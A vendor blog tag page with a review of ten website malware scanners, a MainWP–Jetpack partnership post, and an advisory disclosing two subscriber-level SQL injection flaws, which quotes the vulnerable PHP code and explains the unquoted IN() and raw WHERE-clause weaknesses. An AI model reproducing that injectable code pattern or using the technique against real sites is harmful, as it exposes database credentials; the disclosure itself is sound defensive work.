EDITS.WS

Tag: Vulnerabilities

  • 10 Best Tools to Check a Website for Malware & Viruses

    As a website owner, you’ve worked hard to develop your website and build your business. But, with Google issuing over three million safe browsing warnings a day, it’s clear that you have to be vigilant against the ever-present threat of malware.

    A single malware infection can cripple your website, damage your reputation, and even steal your customers’ data. That’s why it’s essential to have a reliable malware scanner in place to help you spot an infection as soon as it happens, so you can take steps to secure your site and get it back up and running.

    With so many malware scanners available, it can be challenging to know which one to choose. However, thanks to our comprehensive review of the best website malware scanners, you’ll be able to determine the right option for you.

    The top ten tools to scan a website for viruses and malware


    1. Jetpack Protect

    Jetpack Protect is one of the best ways to check your WordPress website for malware and keeps you one step ahead of security threats. This free plugin can be set up in just one click, and it’ll get to work checking your site daily for vulnerabilities that hackers could exploit to inject malware — so you can prevent issues before they start. And, with a paid upgrade, it will check your entire site for tens of thousands of known malware definitions and immediately alert you if something’s found.

    Jetpack Protect allows you to secure your site without slowing it down, as it uses state-of-the-art decentralized scanning technology which can search your entire site — including the admin area, themes, and plugins — using Jetpack’s servers.

    The plugin scans your site against an extensive database that is updated by dedicated WordPress security experts as soon as new vulnerabilities, viruses, or malware are discovered. If Jetpack Protect does detect an issue on your site, it will notify you via your Jetpack dashboard and will provide straightforward guidance to help you secure your site and remove malware from your WordPress site.

    Jetpack Protect is made by Automattic, the team behind WordPress.com, which means it seamlessly integrates with any WordPress site. The tool uses the same technology used to guard some of the world’s leading brands, so you know you’re in good hands. 

    Key features of Jetpack Protect:

    • A simple one-click setup 
    • Automatic ‘set it and forget it’ daily scans for vulnerabilities that keep your site secure 
    • Scans of plugins, themes, and WordPress core for potential vulnerabilities 
    • Recommended actions to help you resolve any issues that are found
    • Automated daily malware scanning against over 37,000 definitions (paid)
    • A Web Application Firewall (paid)
    • Instant email notifications (paid)

    Pros of Jetpack Protect:

    • As the automatic malware scans run on Jetpack’s servers, Jetpack Protect can scan your entire site without slowing it down.
    • The plugin uses the same malware database as the advanced enterprise-level tool, WPScan, which is constantly updated by experienced online security experts.
    • You can start protecting your site with just a single click, and it’ll run scans daily and notify you of any issues through your dashboard.

    Cons of Jetpack Protect:

    • Jetpack Protect was designed specifically for WordPress websites, so if your site doesn’t use WordPress, you’ll need to explore one of the other options on our list.
    • While the plugin offers advice on resolving any security issues, it doesn’t provide automatic malware removal without a paid upgrade.

    Ease of use:

    Jetpack Protect is super simple to use, as it only takes one click to activate its advanced scanning tools. There is also no need to remember to run scans, as the plugin will protect your site automatically in the background. Detailed documentation is available, and if you need support, you can access Jetpack’s team of WordPress Happiness Engineers.

    Pricing of Jetpack Protect:

    Jetpack Protect is available for free from the WordPress plugin directory. 


    2. Wordfence

    Wordfence is a WordPress security plugin that offers a range of features to protect your website from malware, viruses, and other threats. One of the key features of Wordfence is its malware scanner, which automatically checks your website for malware and other vulnerabilities.

    Wordfence is a server-side malware scanner (so it will use resources from your host) that allows you to check your entire website, including plugins and themes. The scanner looks for a wide range of vulnerabilities and signs of malware or viruses, including malicious redirects, backdoors, and code injections. 

    In addition, Wordfence has a dedicated team of website security experts who regularly update its database with new malware and virus definitions, which are immediately available to premium customers so that your site is protected against the latest threats.

    If Wordfence detects malware, it will automatically quarantine infected files, prevent them from being executed, and alert you via email. Wordfence can help you recover from simple malware attacks by replacing damaged core WordPress files with a clean version and deleting any malicious ones. Complete malware removal is included at some of the higher-tier subscription levels.

    Key features of Wordfence:

    • Automated malware and virus scanning
    • Daily email alerts
    • Basic repair and deletion functions for removing simple malware
    • A range of other security features, including a firewall and access logging
    • Regular malware definition updates (premium)
    • Malware removal by a security expert (premium)

    Pros of Wordfence:

    • Wordfence conducts daily scans of your site and will email you if it notices any issues.
    • Alongside the malware scanner, Wordfence also includes various other security features, including a Web Application Firewall (WAF) and two-factor authentication.

    Cons of Wordfence:

    • The free version of Wordfence only receives new malware definitions 30 days after a new piece of malware is identified, meaning you have to upgrade to a paid plan if you want to detect the latest threats.
    • Wordfence uses your server’s resources to conduct its scans, which could impact your site’s performance.
    • Wordfence only works with WordPress websites.

    Ease of use:

    Wordfence requires configuration to ensure that it fully protects your site, but when it’s set up, its automatic scanning and notifications mean things are pretty hands-off. Sometimes the email alerts sent by Wordfence flag legitimate changes as a concern, which could cause confusion if you’re unfamiliar with website security and the WordPress ecosystem. 

    Wordfence has comprehensive documentation and a learning center. Support is offered for free users through the plugin’s support forum and via email for premium subscribers. 

    Pricing of Wordfence:

    Wordfence offers a free plan, but there’s a 30-day delay between new discoveries of malware and when the free plan updates the database to include those discoveries in scans. 

    Wordfence Premium costs $119 a year and includes daily malware database updates. 

    Wordfence Care costs $490 a year, including installation and optimization of the plugin and malware removal by a WordPress security expert.


    3. Sucuri

    Sucuri is a well-known name in website security that offers a free malware scanner alongside several premium services that can help keep your site safe, including a web application firewall, DDoS protection, and malware removal.

    Sucuri’s free SiteCheck external malware scanner allows you to scan the front end of your site for malware by entering its URL. If your website is built using WordPress, Sucuri offers a basic plugin that will check your site’s WordPress core files for any changes. 

    Sucuri also offers premium plans, including automatic malware and virus scanning and access to a server-side scanner to check all your website files.

    Key features of Sucuri:

    • A free external malware scanner
    • File integrity scanning 
    • Security event logs 
    • Automated malware scanning (premium)
    • Server-side malware scanning (premium)
    • Malware removal (premium)
    • Blocklist monitoring (premium)
    • A web application firewall (premium)

    Pros of Sucuri:

    • Sucuri’s SiteCheck scanner is free and doesn’t require an account.
    • Sucuri is platform-agnostic, so it will work regardless of how your website is built.

    Cons of Sucuri:

    • Sucuri’s free malware scanner does not offer automatic scanning, so you must regularly visit the SiteCheck website and enter your URL to check your site for malware.
    • Sucuri’s free SiteCheck scanner may not be able to spot all malware on your site. This is because the malware scan is conducted remotely, so it can only check for malware in the source code of the public-facing pages on your site. 
    • If your site is built on WordPress, Sucuri says that their free WordPress malware scanner isn’t 100% accurate. Malware could be inserted into plugin files or other admin areas and, therefore, wouldn’t appear on your site’s front end.

    Ease of use:

    Sucuri’s free malware scanner is simple to use as it only requires your website URL. However, unless you subscribe to a premium plan, you need to remember to manually run the scan to ensure you spot any malware or virus infections. 

    The server-side scanner could be confusing for non-technical website owners to set up, as it requires FTP/SFTP credentials. Sucuri offers a range of guides and documentation, and its premium customers are offered email support.

    Pricing of Sucuri:

    Sucuri SiteCheck and their WordPress plugin are free of charge. Premium subscriptions start at $199 a year and include a range of features, including server-side automatic malware scanning, a web application firewall, and unlimited malware removal. 


    4. MalCare

    MalCare is a malware scanning and removal service specifically for WordPress websites. The plugin offers automatic malware scanning alongside other security features, including a web application firewall to prevent attackers from accessing your site.

    MalCare’s malware scanner will automatically scan your entire site, including admin files, plugins, and themes. The plugin temporarily and securely copies your files to its servers to conduct each malware scan, meaning that scans won’t slow down your site. 

    MalCare also monitors your website’s files and databases and will let you know if it spots a change that it thinks could be the result of malware. If it thinks you have a malware or virus infection, it will alert you by email, and the plugin’s premium version offers automatic malware removal.

    Key features of MalCare:

    • A malware scanner with automatic daily scanning
    • Vulnerability detection
    • Monitoring for suspicious file changes
    • A web application firewall
    • Automated malware cleaning (premium)

    Pros of MalCare:

    • MalCare offers automatic daily malware scans, which can check your entire site.
    • The plugin uses MalCare’s servers to carry out its malware scanning, meaning it won’t slow down your site.
    • MalCare will send you an alert by email if it finds any signs of a malware infection, so you can take action to secure your site.

    Cons of MalCare:

    • While the free version of the plugin will tell you if your site is infected with malware, it won’t let you know where it is. Instead, you must upgrade to a premium plan to locate and remove the infection.
    • MalCare is a solution specifically designed for WordPress website owners to check their site for malware, so if your site does not use WordPress, you’ll need to explore one of the other options on our list.

    Ease of use:

    MalCare is easy to install and set up, and its automatic scans mean you don’t need to remember to scan your site. The automated malware removal in its premium version makes it simple to recover your site from most infections. MalCare offers email support for all users and live chat support for premium users.

    Pricing of MalCare:

    There’s a free version available from the WordPress plugin directory. Premium plans include malware removal and start at $99 a year.

    5. Jetpack Scan 

    Jetpack Scan is one of the best ways for WordPress website owners to check their sites for malware and viruses. Jetpack Scan acts as a security guard who constantly watches over your site, taking all the stress out of protecting your site from the latest security threats.

    Jetpack Scan is a premium feature of the Jetpack plugin, which is maintained by Automattic — the same people who are behind WordPress.com, WPScan, and WooCommerce. This means you’ll benefit from the expertise of dedicated WordPress security specialists, who ensure that the vulnerability database used by Jetpack Scan is kept up to date with the latest malware, viruses, and exploits.

    As soon as it’s installed, Jetpack Scan gets to work, scouring your site for malware and vulnerabilities. 

    If an issue is detected, it’ll notify you immediately and provide clear guidance about any identified threats. And, in most cases, Jetpack Scan will offer simple, one-click fixes, so you can get back to running your site.

    Even if your site has been taken offline by a malware attack, you can still see the results of the latest malware scan and implement most one-click fixes from the cloud, meaning you’ll be able to quickly get your site back up and running.

    Jetpack Scan uses clever decentralized scanning technology to scan your entire website, including admin pages, themes, and plugins. It does so with Automattic’s servers, allowing you to benefit from the same protection enjoyed by millions of WordPress websites without slowing down your site. You’ll also get access to other security features, including a web application firewall. You can benefit from even more features, including automated backups and spam protection, by purchasing the Jetpack Security bundle.  

    Key features of Jetpack Scan:

    • Automated daily scanning
    • Instant email notifications if any issues are found
    • One-click fixes to resolve the majority of security threats
    • The ability to access your scan results and one-click fixes even if your site is down
    • A vulnerability database updated by WordPress security experts
    • A web application firewall to help keep hackers out of your site 
    • Priority support from Jetpack’s WordPress Happiness Engineers

    Pros of Jetpack Scan:

    • As Jetpack Scan keeps watch over your site through its automated daily scans, you can ‘set it and forget it’ and rest easy knowing that you’ll be notified immediately if anything’s ever found.
    • Jetpack Scan offers one-click fixes for most malware infections and security vulnerabilities.
    • Jetpack Scan integrates seamlessly with WordPress and WooCommerce and works alongside other Jetpack features, including VaultPress Backup.

    Cons of Jetpack Scan:

    • Jetpack Scan was designed specifically for WordPress websites, so if your site doesn’t use WordPress, you’ll need to explore another option on this list.

    Ease of use:

    Jetpack Scan is simple to set up and use. Its automated scans mean you don’t have to worry about remembering to scan your site, and one-click fixes make solving the majority of security issues simple. Plus, detailed documentation and priority support from Jetpack’s team of Happiness Engineers is available for all Jetpack Scan users.

    Pricing of Jetpack Scan:

    Jetpack Scan is available through the Jetpack plugin or as an upgrade to the Jetpack Protect plugin for just $10 a month. You can also benefit from Jetpack Scan by purchasing Jetpack’s Security or Complete bundles.


    6. IsItWP Security Scanner

    IsItWP provides a range of tools for site owners, including a website malware scanner, which can check any website for malware and other security vulnerabilities. IsItWP’s scanner is powered by Sucuri, allowing you to scan your site’s front end pages for malware by entering its URL.

    In addition to checking your site for malware and viruses, IsItWP’s scanner also checks if your site is listed in Google’s Safe Browsing and other malware blocklists.

    Key features of IsItWP Security Scanner:

    • The ability to check any website’s public-facing pages for malware and viruses
    • Reports that outline if malware is found or if the website is on Google’s Safe Browsing or other malware blocklists

    Pros of IsItWP Security Scanner:

    • It allows you to check any website for malware by simply entering its URL.

    Cons of IsItWP Security Scanner:

    • There’s no automated scanning option, meaning you must remember to visit IsItWP to check your site for malware.
    • The scanner can only find malware that is present on the front end pages of your website.
    • If malware or viruses are detected, IsItWP doesn’t provide any guidance or tools to help you remove the malware and restore your site.
    • The online scanner is slower than many others on this list.

    Ease of use:

    IsItWP Security Scanner is easy to use as it only requires you to enter your website’s URL to check it for malware.

    Pricing of IsItWP Security Scanner:

    IsItWP Security Scanner is free to use.


    7. SiteLock

    SiteLock offers a range of malware detection and removal services, including a free online malware scanner.

    SiteLock’s free scanner allows you to check the public-facing pages of any website for malware. The web-based scanner returns results in under 60 seconds and also checks for any known viruses or other vulnerabilities.

    SiteLock also offers a number of premium plans which offer automated scans, notifications, and automatic malware removal. Premium customers can also scan their entire website, including admin pages, plugins, and files, using SiteLock’s cloud servers so that website performance is not impacted. 

    Premium scans also check for additional security concerns, including SQL injections and cross-site scripting, as well as your website’s status on malware blacklists.

    Key features of SiteLock:

    • A free, web-based malware scanner
    • Automated daily scans (premium)
    • Automatic malware removal (premium)
    • Additional security features including a web application firewall and DDoS protection (premium)

    Pros of SiteLock:

    • SiteLock’s free online malware scanner is quicker than many others and provides results in an easy-to-understand format.
    • SiteLock’s premium plans feature automated malware removal, so malware is removed from your site as soon as it’s identified.

    Cons of SiteLock:

    • Automated scanning is only available on premium plans.
    • While SiteLock supports WordPress and other content management systems, its plugin is not widely used.

    Ease of use:

    The web-based scanner is easy to use and returns results quickly. For SiteLock’s premium features to work, you must provide FTP/SFTP details, which could be confusing for some users. Email support, with a guaranteed 30-hour response time, is provided to all premium customers.

    Pricing of SiteLock:

    SiteLock’s online scanner is free. Premium plans, which include automated scans of all areas of your site and malware removal, start at $15 a month.


    8. Detectify

    Detectify is a cybersecurity company that offers a range of options to check websites and web apps for malware and viruses. Detectify is designed specifically for complex DevOps environments. It can be configured to run either on-demand or scheduled security scans that look at your entire website, including back-end resources.

    In addition to malware, Detectify will scan your server for a wide range of other security risks and vulnerabilities, including SQL injections, authentication vulnerabilities, and SSL issues. Scans also check your site against a unique list of exploits gathered from the hacker community to help keep your site secure from the latest threats.

    Detectify will integrate into your existing workflow to inform you of the results of its scans through tools such as Slack or Jira so that you can take action to address any issues it has identified. 

    Key features of Detectify:

    • Enterprise-grade malware and vulnerability scanning
    • Scans for a wide range of potential security issues
    • Scans of your entire website
    • Multiple scan profiles

    Pros of Detectify:

    • Detectify offers a high level of security for complex web apps and websites that checks for a range of vulnerabilities, including malware and viruses.

    Cons of Detectify:

    • Detectify is an enterprise-grade service, and therefore it offers many features that most website owners may not need.
    • Due to its advanced features, Detectify is significantly more expensive than any other option on this list.

    Ease of use:

    Due to its range of options and scan profiles, Detectify is more complex to set up than many other options on this list. It may require the support of a DevOps specialist to integrate with your website.

    Pricing of Detectify:

    Detectify plans are customizable, but start at around $80 per month.


    9. Quttera

    Quttera is an established name in website security, and they offer a number of different solutions to check your website for malware, including a free online malware scanner. All of Quttera’s solutions use a patented malware-detection algorithm that it claims can detect previously unknown malware rather than checking your site’s files against a list of malware definitions.

    Quttera’s online malware scanner can only check the front end of your website. But, if your website is built using WordPress, then Quttera’s free plugin will scan your entire site for malware, including admin pages and plugins. A detailed report is provided after each scan, which identifies any malicious or suspicious files, and lets you know your site’s status on several common malware blocklists.

    Quttera’s premium ThreatSign! product offers automated malware scanning, including server-side scanning for all websites, and automated malware removal is provided with some plans.

    Key features of Quttera:

    • A web-based malware scanner
    • A WordPress plugin that checks all website files
    • Malware blocklist checking
    • Automated scanning (premium only)
    • Malware removal (premium only)
    • Additional security features, including a web application firewall and DDoS protection (premium only)

    Pros of Quttera:

    • The free report provided by Quttera is more detailed than the reports provided by other free tools on this list.
    • Quttera’s server-side scanning, available via their WordPress plugin and premium plans, uses their cloud servers to conduct the scan, meaning it won’t slow down your site.
    • Quttera’s malware detection algorithm can detect previously unknown malware.

    Cons of Quttera:

    • Scans using the free web-based tool can only check the front end of your site.
    • Automatic scanning is only available on premium plans.

    Ease of use:

    Quttera’s web-based scanner and WordPress plugin are both easy to use, but the lack of automation means that you need to remember to check your site regularly for malware. Support is only available to premium subscribers.

    Pricing of Quttera:

    Quttera’s web-based scanner and WordPress plugin are free. Premium plans offer automatic scanning and other security features for $10 a month, with plans that offer malware removal starting at $179 a year.


    10. Google Transparency Report

    Google’s Transparency Report provides information on Google’s services, and has a section dedicated to its Safe Browsing technology. Site owners can enter their URL and check its Safe Browsing status to see if it has been flagged as unsafe by Google.

    Safe Browsing is Google’s technology that checks websites for malware and phishing attacks and flags them as unsafe for visitors if they’re potentially malicious. 

    Key features of Google’s Transparency Report:

    • Includes a tool that checks if a site has been identified as unsafe
    • Reports that offer a basic reason for the site being listed as unsafe

    Pros of Google’s Transparency Report:

    • The Safe Browsing status check allows website owners to see if Google has identified signs of malware on their site.
    • The service is free of charge and can be used by anyone to check the status of a site.

    Cons of Google’s Transparency Report:

    • The Safe Browsing status check is not automatic, meaning you must remember to check your site’s status.
    • Google Transparency Report’s Safe Browsing status check section is not a substitute for a comprehensive malware scanning solution because it’s not proactive and only reports issues after visitors are likely to have been affected.
    • Google’s Safe Browsing technology does not scan every website, and the frequency of scans is not publicly available.
    • The Safe Browsing status check does not provide any guidance on how to remove malware if it’s identified on your site.

    Ease of use:

    The Google Transparency Report Safe Browsing status check is easy to use and quickly returns the Safe Browsing status for the URL you enter.

    Pricing of Google’s Transparency Report:

    Google’s Transparency Report is free to use.

    A comparison of the best website malware scanners

    Made especially for WordPress websites

    • Jetpack Protect: Yes
    • Wordfence: Yes
    • Sucuri: No
    • MalCare: Yes
    • Jetpack Scan: Yes
    • IsItWP Security Scanner: No
    • SiteLock: No
    • Detectify: No
    • Quttera: No
    • Google Transparency Report: No

    Number of malware definitions your site is checked against

    • Jetpack Protect: Over 37,000
    • Wordfence: Yes (with a paid plan)
    • Sucuri: Not stated
    • MalCare: Not stated
    • Jetpack Scan: Over 37,000
    • IsItWP Security Scanner: Not stated
    • SiteLock: Not stated
    • Detectify: Not stated
    • Quttera: Uses proprietary algorithm
    • Google Transparency Report: Not stated

    Automated scans

    • Jetpack Protect: Yes
    • Wordfence: Yes
    • Sucuri: Premium only
    • MalCare: Yes
    • Jetpack Scan: Yes
    • IsItWP Security Scanner: No
    • SiteLock: Premium only
    • Detectify: Yes
    • Quttera: Premium only
    • Google Transparency Report: No

    Scans your full site, including admin files

    • Jetpack Protect: Yes
    • Wordfence: Yes
    • Sucuri: Premium only
    • MalCare: Yes
    • Jetpack Scan: Yes
    • IsItWP Security Scanner: No (checks front end files only)
    • SiteLock: Premium only
    • Detectify: Yes
    • Quttera: Premium only
    • Google Transparency Report: No (checks front end files only)

    Can scans impact website performance?

    • Jetpack Protect: No
    • Wordfence: Yes
    • Sucuri: No (external scanner)
    • MalCare: Yes
    • Jetpack Scan: No
    • IsItWP Security Scanner: No
    • SiteLock: No
    • Detectify: Yes
    • Quttera: No
    • Google Transparency Report: No

    Frequency of malware definition updates

    • Jetpack Protect: Daily
    • Wordfence: Every 30 days (free version); daily (pro version)
    • Sucuri: Daily
    • MalCare: Daily
    • Jetpack Scan: Unknown
    • IsItWP Security Scanner: Daily
    • SiteLock: Daily
    • Detectify: Daily
    • Quttera: N/A
    • Google Transparency Report: Daily

    Malware removal if malware is found

    • Jetpack Protect: Yes (with a paid plan)
    • Wordfence: Limited removal in the premium version; full removal in the Care version
    • Sucuri: Premium only
    • MalCare: Premium only
    • Jetpack Scan: Yes (with a paid plan)
    • IsItWP Security Scanner: No
    • SiteLock: Premium only
    • Detectify: No
    • Quttera: Premium only
    • Google Transparency Report: No

    Price

    • Jetpack Protect: Free with paid upgrades
    • Wordfence: Limited free version; premium plans start at $99/year
    • Sucuri: Limited free online scanner; premium plans start at $199/year
    • MalCare: Limited free version; premium plans start at $69/year
    • Jetpack Scan: $10/month
    • IsItWP Security Scanner: Free
    • SiteLock: Free online front end scanner; premium plans start at $15 a month
    • Detectify: From $80/month
    • Quttera: Limited free online scanner and plugin; premium plans start at $10 a month, and plans including malware removal start at $179 a year
    • Google Transparency Report: Free

    Frequently asked questions about malware scanners

    What is the best website scanner to check for viruses and malware?

    The best website scanner to check for viruses and malware will depend on the platform or CMS your site is built on.

    For example, WordPress site owners should opt for a malware scanner that’s built specifically for WordPress, and it’s clear from our review that Jetpack Protect is the best option. It offers automated scans for vulnerabilities with premium access to a malware database that’s constantly updated by a team of WordPress security experts, so you can be sure your site is being checked for the latest issues. 

    Alternatively, you could use the premium Jetpack Scan feature available with the Jetpack plugin.

    Both Jetpack Scan and the paid upgrade for Jetpack Protect offer clear guidance and one-click fixes if a security threat is identified, along with a web application firewall to keep malicious actors off of your site.

    Should I use an external or server-side malware scanner?

    Many of the free website scanners only search the external pages of your website for malware, and this means that they won’t spot issues that are hidden on the back end of your site. 

    In contrast, server-side malware scanners offer full protection, since they scan the entirety of your site. But, if the malware scanning happens on your server, it could temporarily slow down your website performance. This means the best option to scan your site for malware is to use a tool that uses decentralized scanning technology. 

    For example, Jetpack Protect uses Automattic’s cloud servers to securely scan the front and back ends of your site, meaning you don’t have to worry about the impact on performance while its comprehensive automated scans are being carried out.
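    The difference between an external scan and a server-side scan comes down to what each one can see: an external scanner only reads the HTML your public pages return, while a server-side scanner reads the files on disk and can tell when one has been added or altered. The script below is an added illustration of that server-side idea, written for this page rather than taken from Jetpack, Sucuri, or any other product named here. It builds a small constructed WordPress-like directory tree (the file names and contents are placeholders, not real WordPress files), records a SHA-256 baseline, then simulates two back-end changes that would never show up in rendered HTML (a new file dropped into a plugin folder and an edited theme file) and reports what changed.

```python
"""Baseline-and-compare file integrity check, the core idea behind a
server-side scan. Added example; not code from Jetpack, Sucuri, or any
other product. The sample site tree and its contents are constructed."""
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root):
    """Return {relative_path: sha256 hex digest} for every regular file under root."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256()
            with path.open("rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[path.relative_to(root).as_posix()] = digest.hexdigest()
    return manifest


def compare(baseline, current):
    """Classify files as added, removed, or modified relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def build_sample_site(root):
    """Constructed sample tree shaped like a WordPress install (placeholder contents)."""
    files = {
        "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
        "wp-config.php": "<?php define('DB_NAME', 'example');\n",
        "wp-content/plugins/hello/hello.php": "<?php // plugin placeholder\n",
        "wp-content/themes/demo/functions.php": "<?php // theme functions\n",
    }
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)


def demo():
    """Take a baseline, simulate two back-end changes, and return the diff."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        baseline = hash_tree(root)
        # Simulated changes that an external (front-end) scan cannot observe:
        # a new file inside a plugin directory and an edited theme file.
        (Path(root) / "wp-content/plugins/hello/extra.php").write_text(
            "<?php // constructed: file added after baseline\n")
        (Path(root) / "wp-content/themes/demo/functions.php").write_text(
            "<?php // constructed: edited after baseline\n")
        return compare(baseline, hash_tree(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

    Running it prints one added file and one modified file; a real deployment would store the baseline manifest somewhere the web server cannot write to and re-run the comparison on a schedule, which is the "automated scanning" feature the comparison above lists for each product.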

    How do I scan a WordPress website for malware?

    To scan your WordPress site for malware, you’ll need to use a malware scanner such as Jetpack Protect that can scan your entire website, including your plugins and themes.

    You can install Jetpack Protect for free by going to Plugins → Add New inside of your WordPress dashboard. Then, search for “Jetpack Protect” and click Install Now → Activate.


    Then, choose either Jetpack Protect or upgrade to benefit from additional features, including one-click malware fixes and a web application firewall.

    Jetpack Protect will then get to work scanning your entire site for malware.


    Once its scan is complete, you’ll be shown the results and told if any security threats have been identified on your site. If Jetpack Protect has identified any issues, it’ll give you a clear description of the issue and let you know where it’s located.


    Jetpack Protect will automatically scan your site for vulnerabilities every day. You can see the results of your scans by going to your WordPress admin dashboard menu and selecting Jetpack → Protect.


    You can also run a manual scan at any time by clicking Scan Now.

    How can I prevent my website from being affected or hacked in the future?

    While regular automated scanning will help you detect a malware infection, preventing the infection in the first place is the best way to protect your site. Here are some ways you can do this:

    • Use strong passwords. The easier your password is to guess, the more likely it is that a malicious hacker will be able to guess it to get access to your website and install malware. Learn more about securing your WordPress login page.
    • Enable secure authentication. Secure authentication requires users to provide a code from their mobile device alongside their username and password, meaning that if someone does happen to crack your password, they still can’t log in and cause damage to your site.
    • Limit admin user accounts. By limiting the number of users who can have full access to your site, you reduce the number of accounts that could become compromised and used to infect your site with malware.
    • Keep your site up to date. By keeping the software up to date, including any plugins and themes, you’ll benefit from the latest security improvements and vulnerability patches.
    • Get protection against brute force attacks. Brute force protection stops bots that try hundreds of username/password combinations each second until they find one that lets them into your site.
    • Use a web application firewall. Firewalls help prevent attackers from gaining access to your site and are essential for all website owners. For example, Jetpack Scan includes a firewall specifically designed for WordPress sites that uses a vast database to help it identify potentially malicious visitors. 

    WordPress site owners can help keep their site secure and prevent malware infections by using a complete WordPress security solution such as Jetpack Security, which includes advanced features including backups, Jetpack Scan, and protection from spam.

  • MainWP Partners with Jetpack for WordPress Security

    Managing multiple WordPress sites can be stressful. With the average WordPress site running 22 plugins, it’s crucial that every vulnerability is accounted for. That’s why we’re thrilled to announce our partnership with MainWP, bringing you two new Jetpack extensions in the MainWP marketplace. With this new agreement in place, managing multiple WordPress sites has never been easier.

    Jetpack has a full suite of single-purpose plugins designed to protect websites. MainWP has now integrated two Jetpack extensions into their marketplace:

    • Jetpack Protect – a free plugin for malware prevention.
    • Jetpack Scan – a premium plugin that includes automated daily scanning, one-click fixes for most issues, and a WAF (web application firewall).

    Jetpack Scan will review all the files on your site, looking for any plugin or theme that our research team has flagged for vulnerabilities, so you can take action immediately. Jetpack Scan will further fix issues for you with your one-click approval.


    Why MainWP?

    The MainWP WordPress Manager Dashboard plugin allows you to control multiple WordPress websites (including sites on different hosting platforms) from your own private, self-hosted WordPress website. MainWP is free with the option to upgrade to a premium version.

    Privacy is what differentiates MainWP from other options on the market. The MainWP plugins come with their own privacy policies to ensure that any personally identifiable information (PII) is not collected.

    MainWP Customers Can Access a Jetpack Scan Discount with a Coupon

    To make it even more affordable for agencies to protect their sites, MainWP has enabled couponing, which allows clients to enable Jetpack Scan at a discount. 


    They can then claim and apply the coupon from the MainWP extension.

    Why MainWP + Jetpack?

    MainWP provides a WordPress management dashboard that is self-hosted, open source and used by more than 10,000 agencies and builders to manage over 600,000 WordPress sites. 

    For agencies and builders, there is nothing more mission-critical than steering your sites to safety past WordPress vulnerabilities. Jetpack’s Protect and Scan plugins are built on WPScan, the most trusted WordPress vulnerability service. The MainWP team is thrilled to partner with Automattic’s Jetpack to make it simple for MainWP clients to protect their sites.

    Dennis Dornon, Co-Founder of MainWP

    We hear from agency clients over and again that MainWP is critical for their business. This is an exciting launch for us as we are confident that almost every MainWP client can benefit from protecting their sites with Jetpack Protect or Jetpack Scan.

    Mike Bray, Head of Partnerships and Business Development at Jetpack

    Check out the two new Jetpack extensions in the MainWP marketplace for yourself!

  • SQL Injection Discovered And Fixed In Slimstat Analytics and Paid Memberships Pro

    During an internal audit of the Slimstat Analytics and Paid Memberships Pro plugins, we uncovered two SQL Injection vulnerabilities that could allow low-privileged users like subscribers to leak sensitive information from a site’s database.

    If exploited, the vulnerability could grant attackers access to privileged information from affected sites’ databases (e.g., usernames and hashed passwords).

    We reported the vulnerabilities to the plugin’s authors, and they recently released Slimstat Analytics version 4.9.3.3 and Paid Memberships Pro version 2.9.12 to address them. We strongly recommend that you update affected plugins to their respective latest version, and have an established security solution on your site, such as Jetpack Security.

    Subscriber+ SQL Injection in Slimstat Analytics

    Plugin Name: Slimstat Analytics
    Plugin URI: https://wordpress.org/plugins/wp-slimsta
    Author: https://wp-slimstat.com
    Affected Versions: Every version between 4.1 and 4.9.3.3
    CVE-ID: CVE-2023-0630
    WPScan ID: b82bdd02-b699-4527-86cc-d60b56ab0c55
    CVSSv3.1: 7.7

    // Init the database library with the appropriate filters
    if ( strpos ( $_content, 'WHERE:' ) !== false ) {
        $where = html_entity_decode( str_replace( 'WHERE:', '', $_content ), ENT_QUOTES, 'UTF-8' );
    }
    else{
        wp_slimstat_db::init( html_entity_decode( $_content, ENT_QUOTES, 'UTF-8' ) );
    }

    switch( $f ) {
        case 'count':
        case 'count-all':
            $output = wp_slimstat_db::count_records( $w, $where, strpos( $f, 'all') === false ) + $o;
            break;


    The slimstat shortcode lets users add filtering logic in the form of SQL WHERE clauses by looking for a “WHERE:” token inside the shortcode’s content. This is a problem because, as we reported in an earlier vulnerability advisory, any user logged in to a site, including subscribers, can render shortcodes in WordPress.

    A proof of concept exploit for this vulnerability will be available on this vulnerability’s WPScan entry.

    Subscriber+ SQL Injection in Paid Memberships Pro

    Plugin Name: Paid Memberships Pro
    Plugin URI: https://wordpress.org/plugins/paid-memberships-pro/
    Author: https://www.paidmembershipspro.com/
    Affected Versions: Every version between 1.5.5 and 2.9.12
    CVE-ID: CVE-2023-0631
    WPScan ID: 19ef92fd-b493-4488-91f0-e6ba51362f79
    CVSSv3.1: 7.7

    if($hasaccess && !empty($delay))
    {
        //okay, this post requires membership. start by getting the user's startdate
        if(!empty($levels))
            $sqlQuery = "SELECT UNIX_TIMESTAMP(CONVERT_TZ(startdate, '+00:00', @@global.time_zone)) FROM $wpdb->pmpro_memberships_users WHERE status = 'active' AND membership_id IN(" . implode(",", array_map( 'esc_sql', $levels ) ) . ") AND user_id = '" . esc_sql( $current_user->ID ) . "' ORDER BY id LIMIT 1";
        else
            $sqlQuery = "SELECT UNIX_TIMESTAMP(CONVERT_TZ(startdate, '+00:00', @@global.time_zone)) FROM $wpdb->pmpro_memberships_users WHERE status = 'active' AND user_id = '" . esc_sql( $current_user->ID ) . "' ORDER BY id LIMIT 1";


    While, at first sight, it may look like the `membership` shortcode properly escapes the $levels variable before concatenating it to an SQL query, the content it adds is not inserted in the context of a string. This effectively means an attacker can abuse that feature to inject SQL statements, so long as they don’t contain any quotes.

    Since shortcodes can be rendered by any logged-in users, like subscribers, this enables low-privileged attackers to leak sensitive information from the database, like usernames and hashed passwords.

    A proof of concept exploit for this vulnerability will be made available on this vulnerability’s WPScan entry.
